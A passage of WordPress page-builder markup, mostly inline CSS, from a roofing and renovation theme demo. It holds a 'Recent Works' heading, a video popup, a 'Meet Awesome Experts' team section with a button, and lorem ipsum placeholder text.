.block-2c42b546-5b19-4262-8165-7d9dd90f6b0c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><style type=\"text/css\"> .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-2c42b546-5b19-4262-8165-7d9dd90f6b0c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"c5ade1d9-8e73-4377-88eb-178302396f1d\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#ffffff\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":64,\"subHeadingTitleFontSizeMobile\":34,\"subHeadingTitleFontSizeTablet\":50,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-desc-text {\n font-size: 64px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-desc-text {\n font-size: 50px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d .responsive-heading-desc-text {\n font-size: 34px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-c5ade1d9-8e73-4377-88eb-178302396f1d {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-c5ade1d9-8e73-4377-88eb-178302396f1d\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#ffffff\">Recent Works</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#ffffff\">We’re Providing Premium<br>Roofing Services</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:skt-blocks/video-popup {\"videoLink\":\"https://www.youtube.com/embed/7er8Dz9JaO0\",\"vidheight\":300,\"opacity\":0,\"counterId\":\"b79f05c0-ebe5-4b26-815c-6970aa7a785d\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-b79f05c0-ebe5-4b26-815c-6970aa7a785d .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: 300px; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-b79f05c0-ebe5-4b26-815c-6970aa7a785d .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-b79f05c0-ebe5-4b26-815c-6970aa7a785d .skt-blocks-video-popup__wrapper{\n max-width: undefinedpx; height: undefinedpx; }\n}\n</style><div class=\"skt-blocks-block-b79f05c0-ebe5-4b26-815c-6970aa7a785d skt-blocks-video-popup alignundefined\"><div class=\"skt-blocks-video-popup__wrapper\" data-video=\"7er8Dz9JaO0\" style=\"border-width:1px;border-style:none;box-shadow:0px 0px   undefined \"><a href=\"#\" class=\"skt-blocks-video-popup__overlay\"></a><span class=\"skt-blocks-video-popup__play-button\"><svg xmlns=\"http://www.w3.org/2000/svg\" width=\"30\" height=\"30\" viewBox=\"0 0 256 320\" style=\"width:30px;height:30px;fill:#ffffff;opacity:1\"><path d=\"M0 0v320l256-160L0 0z\"></path></svg></span></div></div>\n<!-- /wp:skt-blocks/video-popup --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"8eaee92e-e616-46a2-9d4a-e683aac6ce2a\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-7\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-7 skt-blocks-block-section-outer-wrap block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-8eaee92e-e616-46a2-9d4a-e683aac6ce2a.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"4bf804fe-a71c-426e-8620-9384e3ade2ba\"} -->\n<style type=\"text/css\"> .block-4bf804fe-a71c-426e-8620-9384e3ade2ba .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-4bf804fe-a71c-426e-8620-9384e3ade2ba .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-4bf804fe-a71c-426e-8620-9384e3ade2ba .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-4bf804fe-a71c-426e-8620-9384e3ade2ba .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-4bf804fe-a71c-426e-8620-9384e3ade2ba .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-4bf804fe-a71c-426e-8620-9384e3ade2ba .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-4bf804fe-a71c-426e-8620-9384e3ade2ba .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-4bf804fe-a71c-426e-8620-9384e3ade2ba skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingTablet\":30,\"blockId\":\"a230e795-4950-475e-91e7-72865fef243e\"} -->\n<style type=\"text/css\"> .block-a230e795-4950-475e-91e7-72865fef243e .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-a230e795-4950-475e-91e7-72865fef243e .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-a230e795-4950-475e-91e7-72865fef243e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-a230e795-4950-475e-91e7-72865fef243e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-a230e795-4950-475e-91e7-72865fef243e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-a230e795-4950-475e-91e7-72865fef243e\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"7efc2986-5992-4078-a8f0-585e7384483c\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":17,\"headingTitleFontSizeMobile\":17,\"headingTitleFontSizeTablet\":17,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-title-text {\n font-size: 17px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-title-text {\n font-size: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-title-text {\n font-size: 17px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-7efc2986-5992-4078-a8f0-585e7384483c {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-7efc2986-5992-4078-a8f0-585e7384483c\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:500;line-height:1;letter-spacing:0;color:#fe8333\">Leaderships</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Meet Awesome<br>Experts</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"29fe60f7-45c5-43bc-9f5b-528bb0f13ac2\"} -->\n<style type=\"text/css\"> .block-29fe60f7-45c5-43bc-9f5b-528bb0f13ac2 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-29fe60f7-45c5-43bc-9f5b-528bb0f13ac2 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-29fe60f7-45c5-43bc-9f5b-528bb0f13ac2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-29fe60f7-45c5-43bc-9f5b-528bb0f13ac2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-29fe60f7-45c5-43bc-9f5b-528bb0f13ac2 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-29fe60f7-45c5-43bc-9f5b-528bb0f13ac2\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"View All Team Member\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/our-team/\",\"counterId\":\"a982759b-8eb1-4278-8e6d-30ac05e73771\",\"vPadding\":20,\"hPadding\":30,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#ff5e14\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":17,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"500\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 20px; padding-bottom: 20px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 30px; padding-right: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 17px; font-family: Poppins; font-weight: 500; line-height: undefined; opacity: 1; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #ff5e14; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 17px !important; }\n}\n@media only screen and (max-width: 976px){\n.skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n@media only screen and (max-width: 767px){\n .skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-a982759b-8eb1-4278-8e6d-30ac05e73771 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/our-team/\">View All Team Member</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:skt-blocks/team {\"teamBlock\":[{\"teamName\":\"Kevin Albert\",\"teamDesignation\":\"u003cpu003eHandymanu003c/pu003e\",\"teamDescription\":\"Click here to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus 